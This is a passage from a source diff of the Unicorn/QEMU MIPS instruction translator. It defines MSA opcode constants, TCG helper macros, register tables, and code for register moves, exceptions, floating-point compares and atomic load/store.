OPC_FMSUB_df = (0x5 << 22) | OPC_MSA_3RF_1B, + OPC_MADD_Q_df = (0x5 << 22) | OPC_MSA_3RF_1C, + OPC_FCLE_df = (0x6 << 22) | OPC_MSA_3RF_1A, + OPC_MSUB_Q_df = (0x6 << 22) | OPC_MSA_3RF_1C, + OPC_FCULE_df = (0x7 << 22) | OPC_MSA_3RF_1A, + OPC_FEXP2_df = (0x7 << 22) | OPC_MSA_3RF_1B, + OPC_FSAF_df = (0x8 << 22) | OPC_MSA_3RF_1A, + OPC_FEXDO_df = (0x8 << 22) | OPC_MSA_3RF_1B, + OPC_FSUN_df = (0x9 << 22) | OPC_MSA_3RF_1A, + OPC_FSOR_df = (0x9 << 22) | OPC_MSA_3RF_1C, + OPC_FSEQ_df = (0xA << 22) | OPC_MSA_3RF_1A, + OPC_FTQ_df = (0xA << 22) | OPC_MSA_3RF_1B, + OPC_FSUNE_df = (0xA << 22) | OPC_MSA_3RF_1C, + OPC_FSUEQ_df = (0xB << 22) | OPC_MSA_3RF_1A, + OPC_FSNE_df = (0xB << 22) | OPC_MSA_3RF_1C, + OPC_FSLT_df = (0xC << 22) | OPC_MSA_3RF_1A, + OPC_FMIN_df = (0xC << 22) | OPC_MSA_3RF_1B, + OPC_MULR_Q_df = (0xC << 22) | OPC_MSA_3RF_1C, + OPC_FSULT_df = (0xD << 22) | OPC_MSA_3RF_1A, + OPC_FMIN_A_df = (0xD << 22) | OPC_MSA_3RF_1B, + OPC_MADDR_Q_df = (0xD << 22) | OPC_MSA_3RF_1C, + OPC_FSLE_df = (0xE << 22) | OPC_MSA_3RF_1A, + OPC_FMAX_df = (0xE << 22) | OPC_MSA_3RF_1B, + OPC_MSUBR_Q_df = (0xE << 22) | OPC_MSA_3RF_1C, + OPC_FSULE_df = (0xF << 22) | OPC_MSA_3RF_1A, + OPC_FMAX_A_df = (0xF << 22) | OPC_MSA_3RF_1B, + + /* BIT instruction df(bits 22..16) = _B _H _W _D */ + OPC_SLLI_df = (0x0 << 23) | OPC_MSA_BIT_09, + OPC_SAT_S_df = (0x0 << 23) | OPC_MSA_BIT_0A, + OPC_SRAI_df = (0x1 << 23) | OPC_MSA_BIT_09, + OPC_SAT_U_df = (0x1 << 23) | OPC_MSA_BIT_0A, + OPC_SRLI_df = (0x2 << 23) | OPC_MSA_BIT_09, + OPC_SRARI_df = (0x2 << 23) | OPC_MSA_BIT_0A, + OPC_BCLRI_df = (0x3 << 23) | OPC_MSA_BIT_09, + OPC_SRLRI_df = (0x3 << 23) | OPC_MSA_BIT_0A, + OPC_BSETI_df = (0x4 << 23) | OPC_MSA_BIT_09, + OPC_BNEGI_df = (0x5 << 23) | OPC_MSA_BIT_09, + OPC_BINSLI_df = (0x6 << 23) | OPC_MSA_BIT_09, + OPC_BINSRI_df = (0x7 << 23) | OPC_MSA_BIT_09, +}; + + +#define gen_helper_0e0i(tcg_ctx, name, arg) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e1i(tcg_ctx, name, arg1, arg2) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e0i(tcg_ctx, name, ret, arg1) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg1); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e1i(tcg_ctx, name, ret, arg1, arg2) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg2); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e2i(tcg_ctx, name, arg1, arg2, arg3) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_1e2i(tcg_ctx, name, ret, arg1, arg2, arg3) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg3); \ + gen_helper_##name(tcg_ctx, ret, tcg_ctx->cpu_env, arg1, arg2, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +#define gen_helper_0e3i(tcg_ctx, name, arg1, arg2, arg3, arg4) do { \ + TCGv_i32 helper_tmp = tcg_const_i32(tcg_ctx, arg4); \ + gen_helper_##name(tcg_ctx, tcg_ctx->cpu_env, arg1, arg2, arg3, helper_tmp); \ + tcg_temp_free_i32(tcg_ctx, helper_tmp); \ + } while(0) + +typedef struct DisasContext { + struct TranslationBlock *tb; + target_ulong pc, saved_pc; + uint32_t opcode; + int singlestep_enabled; + int insn_flags; + int32_t CP0_Config1; + /* Routine used to access memory */ + int mem_idx; + uint32_t hflags, saved_hflags; + int bstate; + target_ulong btarget; + bool ulri; + int kscrexist; + bool rxi; + int ie; + bool bi; + bool bp; + // Unicorn engine + struct uc_struct *uc; +} DisasContext; + +enum { + BS_NONE = 0, /* We go out of the TB without reaching a branch or an + * exception condition */ + BS_STOP = 1, /* We want to stop translation for any reason */ + BS_BRANCH = 2, /* We reached a branch condition */ + BS_EXCP = 3, /* We reached an exception condition */ +}; + +static const char * const regnames[] = { + "r0", "at", "v0", "v1", "a0", "a1", "a2", "a3", + "t0", "t1", "t2", "t3", "t4", "t5", "t6", "t7", + "s0", "s1", "s2", "s3", "s4", "s5", "s6", "s7", + "t8", "t9", "k0", "k1", "gp", "sp", "s8", "ra", +}; + +static const char * const regnames_HI[] = { + "HI0", "HI1", "HI2", "HI3", +}; + +static const char * const regnames_LO[] = { + "LO0", "LO1", "LO2", "LO3", +}; + +static const char * const fregnames[] = { + "f0", "f1", "f2", "f3", "f4", "f5", "f6", "f7", + "f8", "f9", "f10", "f11", "f12", "f13", "f14", "f15", + "f16", "f17", "f18", "f19", "f20", "f21", "f22", "f23", + "f24", "f25", "f26", "f27", "f28", "f29", "f30", "f31", +}; + +static const char * const msaregnames[] = { + "w0.d0", "w0.d1", "w1.d0", "w1.d1", + "w2.d0", "w2.d1", "w3.d0", "w3.d1", + "w4.d0", "w4.d1", "w5.d0", "w5.d1", + "w6.d0", "w6.d1", "w7.d0", "w7.d1", + "w8.d0", "w8.d1", "w9.d0", "w9.d1", + "w10.d0", "w10.d1", "w11.d0", "w11.d1", + "w12.d0", "w12.d1", "w13.d0", "w13.d1", + "w14.d0", "w14.d1", "w15.d0", "w15.d1", + "w16.d0", "w16.d1", "w17.d0", "w17.d1", + "w18.d0", "w18.d1", "w19.d0", "w19.d1", + "w20.d0", "w20.d1", "w21.d0", "w21.d1", + "w22.d0", "w22.d1", "w23.d0", "w23.d1", + "w24.d0", "w24.d1", "w25.d0", "w25.d1", + "w26.d0", "w26.d1", "w27.d0", "w27.d1", + "w28.d0", "w28.d1", "w29.d0", "w29.d1", + "w30.d0", "w30.d1", "w31.d0", "w31.d1", +}; + +#define MIPS_DEBUG(fmt, ...) \ + do { \ + if (MIPS_DEBUG_DISAS) { \ + qemu_log_mask(CPU_LOG_TB_IN_ASM, \ + TARGET_FMT_lx ": %08x " fmt "\n", \ + ctx->pc, ctx->opcode , ## __VA_ARGS__); \ + } \ + } while (0) + +#define LOG_DISAS(...) \ + do { \ + if (MIPS_DEBUG_DISAS) { \ + qemu_log_mask(CPU_LOG_TB_IN_ASM, ## __VA_ARGS__); \ + } \ + } while (0) + +#define MIPS_INVAL(op) \ + MIPS_DEBUG("Invalid %s %03x %03x %03x", op, ctx->opcode >> 26, \ + ctx->opcode & 0x3F, ((ctx->opcode >> 16) & 0x1F)) + +/* General purpose registers moves. */ +static inline void gen_load_gpr (DisasContext *s, TCGv t, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + if (reg == 0) + tcg_gen_movi_tl(tcg_ctx, t, 0); + else + tcg_gen_mov_tl(tcg_ctx, t, *cpu_gpr[reg]); +} + +static inline void gen_store_gpr (TCGContext *tcg_ctx, TCGv t, int reg) +{ + TCGv **cpu_gpr = (TCGv **)tcg_ctx->cpu_gpr; + if (reg != 0) + tcg_gen_mov_tl(tcg_ctx, *cpu_gpr[reg], t); +} + +/* Moves to/from shadow registers. */ +static inline void gen_load_srsgpr (DisasContext *s, int from, int to) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv t0 = tcg_temp_new(tcg_ctx); + + if (from == 0) + tcg_gen_movi_tl(tcg_ctx, t0, 0); + else { + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); + + tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); + tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); + tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); + tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); + tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); + tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); + + tcg_gen_ld_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * from); + tcg_temp_free_ptr(tcg_ctx, addr); + tcg_temp_free_i32(tcg_ctx, t2); + } + gen_store_gpr(tcg_ctx, t0, to); + tcg_temp_free(tcg_ctx, t0); +} + +static inline void gen_store_srsgpr (DisasContext *s, int from, int to) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + if (to != 0) { + TCGv t0 = tcg_temp_new(tcg_ctx); + TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); + TCGv_ptr addr = tcg_temp_new_ptr(tcg_ctx); + + gen_load_gpr(s, t0, from); + tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_SRSCtl)); + tcg_gen_shri_i32(tcg_ctx, t2, t2, CP0SRSCtl_PSS); + tcg_gen_andi_i32(tcg_ctx, t2, t2, 0xf); + tcg_gen_muli_i32(tcg_ctx, t2, t2, sizeof(target_ulong) * 32); + tcg_gen_ext_i32_ptr(tcg_ctx, addr, t2); + tcg_gen_add_ptr(tcg_ctx, addr, tcg_ctx->cpu_env, addr); + + tcg_gen_st_tl(tcg_ctx, t0, addr, sizeof(target_ulong) * to); + tcg_temp_free_ptr(tcg_ctx, addr); + tcg_temp_free_i32(tcg_ctx, t2); + tcg_temp_free(tcg_ctx, t0); + } +} + +/* Floating point register moves. */ +static void gen_load_fpr32(DisasContext *s, TCGv_i32 t, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_trunc_i64_i32(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); +} + +static void gen_store_fpr32(DisasContext *s, TCGv_i32 t, int reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, t64, t); + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 0, 32); + tcg_temp_free_i64(tcg_ctx, t64); +} + +static void gen_load_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_F64) { + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_shri_i64(tcg_ctx, t64, tcg_ctx->fpu_f64[reg], 32); + tcg_gen_trunc_i64_i32(tcg_ctx, t, t64); + tcg_temp_free_i64(tcg_ctx, t64); + } else { + gen_load_fpr32(ctx, t, reg | 1); + } +} + +static void gen_store_fpr32h(DisasContext *ctx, TCGv_i32 t, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_F64) { + TCGv_i64 t64 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_extu_i32_i64(tcg_ctx, t64, t); + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], tcg_ctx->fpu_f64[reg], t64, 32, 32); + tcg_temp_free_i64(tcg_ctx, t64); + } else { + gen_store_fpr32(ctx, t, reg | 1); + } +} + +static void gen_load_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_F64) { + tcg_gen_mov_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg]); + } else { + tcg_gen_concat32_i64(tcg_ctx, t, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg | 1]); + } +} + +static void gen_store_fpr64(DisasContext *ctx, TCGv_i64 t, int reg) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + if (ctx->hflags & MIPS_HFLAG_F64) { + tcg_gen_mov_i64(tcg_ctx, tcg_ctx->fpu_f64[reg], t); + } else { + TCGv_i64 t0; + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg & ~1], tcg_ctx->fpu_f64[reg & ~1], t, 0, 32); + t0 = tcg_temp_new_i64(tcg_ctx); + tcg_gen_shri_i64(tcg_ctx, t0, t, 32); + tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->fpu_f64[reg | 1], tcg_ctx->fpu_f64[reg | 1], t0, 0, 32); + tcg_temp_free_i64(tcg_ctx, t0); + } +} + +static inline int get_fp_bit (int cc) +{ + if (cc) + return 24 + cc; + else + return 23; +} + +/* Tests */ +static inline void gen_save_pc(DisasContext *ctx, target_ulong pc) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->cpu_PC, pc); +} + +static inline void save_cpu_state (DisasContext *ctx, int do_save_pc) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + LOG_DISAS("hflags %08x saved %08x\n", ctx->hflags, ctx->saved_hflags); + if (do_save_pc && ctx->pc != ctx->saved_pc) { + gen_save_pc(ctx, ctx->pc); + ctx->saved_pc = ctx->pc; + } + if (ctx->hflags != ctx->saved_hflags) { + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->hflags, ctx->hflags); + ctx->saved_hflags = ctx->hflags; + switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_BR: + break; + case MIPS_HFLAG_BC: + case MIPS_HFLAG_BL: + case MIPS_HFLAG_B: + tcg_gen_movi_tl(tcg_ctx, *(TCGv *)tcg_ctx->btarget, ctx->btarget); + break; + } + } +} + +static inline void restore_cpu_state (CPUMIPSState *env, DisasContext *ctx) +{ + ctx->saved_hflags = ctx->hflags; + switch (ctx->hflags & MIPS_HFLAG_BMASK_BASE) { + case MIPS_HFLAG_BR: + break; + case MIPS_HFLAG_BC: + case MIPS_HFLAG_BL: + case MIPS_HFLAG_B: + ctx->btarget = env->btarget; + break; + } +} + +static inline void +generate_exception_err (DisasContext *ctx, int excp, int err) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + TCGv_i32 texcp = tcg_const_i32(tcg_ctx, excp); + TCGv_i32 terr = tcg_const_i32(tcg_ctx, err); + save_cpu_state(ctx, 1); + gen_helper_raise_exception_err(tcg_ctx, tcg_ctx->cpu_env, texcp, terr); + tcg_temp_free_i32(tcg_ctx, terr); + tcg_temp_free_i32(tcg_ctx, texcp); +} + +static inline void +generate_exception (DisasContext *ctx, int excp) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + save_cpu_state(ctx, 1); + gen_helper_0e0i(tcg_ctx, raise_exception, excp); +} + +/* Addresses computation */ +static inline void gen_op_addr_add (DisasContext *ctx, TCGv ret, TCGv arg0, TCGv arg1) +{ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; + tcg_gen_add_tl(tcg_ctx, ret, arg0, arg1); + +#if defined(TARGET_MIPS64) + if (ctx->hflags & MIPS_HFLAG_AWRAP) { + tcg_gen_ext32s_i64(tcg_ctx, ret, ret); + } +#endif +} + +/* Addresses computation (translation time) */ +static target_long addr_add(DisasContext *ctx, target_long base, + target_long offset) +{ + target_long sum = (target_long)((target_ulong)base + offset); + +#if defined(TARGET_MIPS64) + if (ctx->hflags & MIPS_HFLAG_AWRAP) { + sum = (int32_t)sum; + } +#endif + return sum; +} + +static inline void check_cp0_enabled(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_CP0))) + generate_exception_err(ctx, EXCP_CpU, 0); +} + +static inline void check_cp1_enabled(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_FPU))) + generate_exception_err(ctx, EXCP_CpU, 1); +} + +/* Verify that the processor is running with COP1X instructions enabled. + This is associated with the nabla symbol in the MIPS32 and MIPS64 + opcode tables. */ + +static inline void check_cop1x(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_COP1X))) + generate_exception(ctx, EXCP_RI); +} + +/* Verify that the processor is running with 64-bit floating-point + operations enabled. */ + +static inline void check_cp1_64bitmode(DisasContext *ctx) +{ + if (unlikely(~ctx->hflags & (MIPS_HFLAG_F64 | MIPS_HFLAG_COP1X))) + generate_exception(ctx, EXCP_RI); +} + +/* + * Verify if floating point register is valid; an operation is not defined + * if bit 0 of any register specification is set and the FR bit in the + * Status register equals zero, since the register numbers specify an + * even-odd pair of adjacent coprocessor general registers. When the FR bit + * in the Status register equals one, both even and odd register numbers + * are valid. This limitation exists only for 64 bit wide (d,l,ps) registers. + * + * Multiple 64 bit wide registers can be checked by calling + * gen_op_cp1_registers(freg1 | freg2 | ... | fregN); + */ +static inline void check_cp1_registers(DisasContext *ctx, int regs) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_F64) && (regs & 1))) + generate_exception(ctx, EXCP_RI); +} + +/* Verify that the processor is running with DSP instructions enabled. + This is enabled by CP0 Status register MX(24) bit. + */ + +static inline void check_dsp(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSP))) { + if (ctx->insn_flags & ASE_DSP) { + generate_exception(ctx, EXCP_DSPDIS); + } else { + generate_exception(ctx, EXCP_RI); + } + } +} + +static inline void check_dspr2(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_DSPR2))) { + if (ctx->insn_flags & ASE_DSP) { + generate_exception(ctx, EXCP_DSPDIS); + } else { + generate_exception(ctx, EXCP_RI); + } + } +} + +/* This code generates a "reserved instruction" exception if the + CPU does not support the instruction set corresponding to flags. */ +static inline void check_insn(DisasContext *ctx, int flags) +{ + if (unlikely(!(ctx->insn_flags & flags))) { + generate_exception(ctx, EXCP_RI); + } +} + +/* This code generates a "reserved instruction" exception if the + CPU has corresponding flag set which indicates that the instruction + has been removed. */ +static inline void check_insn_opc_removed(DisasContext *ctx, int flags) +{ + if (unlikely(ctx->insn_flags & flags)) { + generate_exception(ctx, EXCP_RI); + } +} + +#ifdef TARGET_MIPS64 +/* This code generates a "reserved instruction" exception if 64-bit + instructions are not enabled. */ +static inline void check_mips_64(DisasContext *ctx) +{ + if (unlikely(!(ctx->hflags & MIPS_HFLAG_64))) + generate_exception(ctx, EXCP_RI); +} +#endif + +/* Define small wrappers for gen_load_fpr* so that we have a uniform + calling interface for 32 and 64-bit FPRs. No sense in changing + all callers for gen_load_fpr32 when we need the CTX parameter for + this one use. */ +#define gen_ldcmp_fpr32(ctx, x, y) gen_load_fpr32(ctx, x, y) +#define gen_ldcmp_fpr64(ctx, x, y) gen_load_fpr64(ctx, x, y) +#define FOP_CONDS(type, abs, fmt, ifmt, bits) \ +static inline void gen_cmp ## type ## _ ## fmt(DisasContext *ctx, int n, \ + int ft, int fs, int cc) \ +{ \ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ + TCGv_i##bits fp0 = tcg_temp_new_i##bits (tcg_ctx); \ + TCGv_i##bits fp1 = tcg_temp_new_i##bits (tcg_ctx); \ + switch (ifmt) { \ + case FMT_PS: \ + check_cp1_64bitmode(ctx); \ + break; \ + case FMT_D: \ + if (abs) { \ + check_cop1x(ctx); \ + } \ + check_cp1_registers(ctx, fs | ft); \ + break; \ + case FMT_S: \ + if (abs) { \ + check_cop1x(ctx); \ + } \ + break; \ + } \ + gen_ldcmp_fpr##bits (ctx, fp0, fs); \ + gen_ldcmp_fpr##bits (ctx, fp1, ft); \ + switch (n) { \ + case 0: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _f, fp0, fp1, cc); break;\ + case 1: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _un, fp0, fp1, cc); break;\ + case 2: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _eq, fp0, fp1, cc); break;\ + case 3: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ueq, fp0, fp1, cc); break;\ + case 4: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _olt, fp0, fp1, cc); break;\ + case 5: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ult, fp0, fp1, cc); break;\ + case 6: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ole, fp0, fp1, cc); break;\ + case 7: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ule, fp0, fp1, cc); break;\ + case 8: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _sf, fp0, fp1, cc); break;\ + case 9: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngle, fp0, fp1, cc); break;\ + case 10: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _seq, fp0, fp1, cc); break;\ + case 11: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngl, fp0, fp1, cc); break;\ + case 12: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _lt, fp0, fp1, cc); break;\ + case 13: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _nge, fp0, fp1, cc); break;\ + case 14: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _le, fp0, fp1, cc); break;\ + case 15: gen_helper_0e2i(tcg_ctx, cmp ## type ## _ ## fmt ## _ngt, fp0, fp1, cc); break;\ + default: abort(); \ + } \ + tcg_temp_free_i##bits (tcg_ctx, fp0); \ + tcg_temp_free_i##bits (tcg_ctx, fp1); \ +} + +FOP_CONDS(, 0, d, FMT_D, 64) +FOP_CONDS(abs, 1, d, FMT_D, 64) +FOP_CONDS(, 0, s, FMT_S, 32) +FOP_CONDS(abs, 1, s, FMT_S, 32) +FOP_CONDS(, 0, ps, FMT_PS, 64) +FOP_CONDS(abs, 1, ps, FMT_PS, 64) +#undef FOP_CONDS + +#define FOP_CONDNS(fmt, ifmt, bits, STORE) \ +static inline void gen_r6_cmp_ ## fmt(DisasContext * ctx, int n, \ + int ft, int fs, int fd) \ +{ \ + TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ + TCGv_i ## bits fp0 = tcg_temp_new_i ## bits(tcg_ctx); \ + TCGv_i ## bits fp1 = tcg_temp_new_i ## bits(tcg_ctx); \ + switch (ifmt) { \ + default: break; \ + case FMT_D: \ + check_cp1_registers(ctx, fs | ft | fd); \ + break; \ + } \ + gen_ldcmp_fpr ## bits(ctx, fp0, fs); \ + gen_ldcmp_fpr ## bits(ctx, fp1, ft); \ + switch (n) { \ + case 0: \ + gen_helper_r6_cmp_ ## fmt ## _af(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 1: \ + gen_helper_r6_cmp_ ## fmt ## _un(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 2: \ + gen_helper_r6_cmp_ ## fmt ## _eq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 3: \ + gen_helper_r6_cmp_ ## fmt ## _ueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 4: \ + gen_helper_r6_cmp_ ## fmt ## _lt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 5: \ + gen_helper_r6_cmp_ ## fmt ## _ult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 6: \ + gen_helper_r6_cmp_ ## fmt ## _le(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 7: \ + gen_helper_r6_cmp_ ## fmt ## _ule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 8: \ + gen_helper_r6_cmp_ ## fmt ## _saf(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 9: \ + gen_helper_r6_cmp_ ## fmt ## _sun(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 10: \ + gen_helper_r6_cmp_ ## fmt ## _seq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 11: \ + gen_helper_r6_cmp_ ## fmt ## _sueq(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 12: \ + gen_helper_r6_cmp_ ## fmt ## _slt(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 13: \ + gen_helper_r6_cmp_ ## fmt ## _sult(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 14: \ + gen_helper_r6_cmp_ ## fmt ## _sle(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 15: \ + gen_helper_r6_cmp_ ## fmt ## _sule(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 17: \ + gen_helper_r6_cmp_ ## fmt ## _or(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 18: \ + gen_helper_r6_cmp_ ## fmt ## _une(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 19: \ + gen_helper_r6_cmp_ ## fmt ## _ne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 25: \ + gen_helper_r6_cmp_ ## fmt ## _sor(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 26: \ + gen_helper_r6_cmp_ ## fmt ## _sune(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + case 27: \ + gen_helper_r6_cmp_ ## fmt ## _sne(tcg_ctx, fp0, tcg_ctx->cpu_env, fp0, fp1); \ + break; \ + default: \ + abort(); \ + } \ + STORE; \ + tcg_temp_free_i ## bits (tcg_ctx, fp0); \ + tcg_temp_free_i ## bits (tcg_ctx, fp1); \ +} + +FOP_CONDNS(d, FMT_D, 64, gen_store_fpr64(ctx, fp0, fd)) +FOP_CONDNS(s, FMT_S, 32, gen_store_fpr32(ctx, fp0, fd)) +#undef FOP_CONDNS +#undef gen_ldcmp_fpr32 +#undef gen_ldcmp_fpr64 + +/* load/store instructions. */ +#ifdef CONFIG_USER_ONLY +#define OP_LD_ATOMIC(insn,fname) \ +static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, DisasContext *ctx) \ +{ \ + TCGv t0 = tcg_temp_new(tcg_ctx); \ + tcg_gen_mov_tl(tcg_ctx, t0, arg1); \ + tcg_gen_qemu_##fname(ret, arg1, ctx->mem_idx); \ + tcg_gen_st_tl(tcg_ctx, t0, tcg_ctx->cpu_env, offsetof(CPUMIPSState, lladdr)); \ + tcg_gen_st_tl(tcg_ctx, ret, tcg_ctx->cpu_env, offsetof(CPUMIPSState, llval)); \ + tcg_temp_free(tcg_ctx, t0); \ +} +#else +#define OP_LD_ATOMIC(insn,fname) \ +static inline void op_ld_##insn(TCGContext *tcg_ctx, TCGv ret, TCGv arg1, DisasContext *ctx) \ +{ \ + gen_helper_1e1i(tcg_ctx, insn, ret, arg1, ctx->mem_idx); \ +} +#endif +OP_LD_ATOMIC(ll,ld32s); +#if defined(TARGET_MIPS64) +OP_LD_ATOMIC(lld,ld64); +#endif +#undef OP_LD_ATOMIC + +#ifdef CONFIG_USER_ONLY +#define OP_ST_ATOMIC(insn,fname,ldname,almask) \ +static inline void op_st_##insn(DisasContext *s, TCGv arg1, TCGv arg2, int rt, DisasContext *ctx) \ +{ \ + TCGContext *tcg_ctx = s->uc->tcg_ctx; \ + TCGv t0 = tcg_temp_new(tcg_ctx); \ + int l1 = gen_new_label(tcg_ctx); \ + int l2 = gen_new_label(tcg_ctx); \ + \ + tcg_gen_andi_tl(tcg_ctx, t0, arg2, almask); \ + tcg_gen_brcondi_tl(tcg_ctx, TCG_COND_EQ, t0, 0, l1); \ + tcg_gen_st_tl(tcg_ctx, arg2, tcg_ctx->cpu_env, offsetof(CPUMIPSState, CP0_BadVAddr)); \ + generate_exception(ctx, EXCP_AdES); \ + gen_set_label(tcg_ctx, l1); \ + 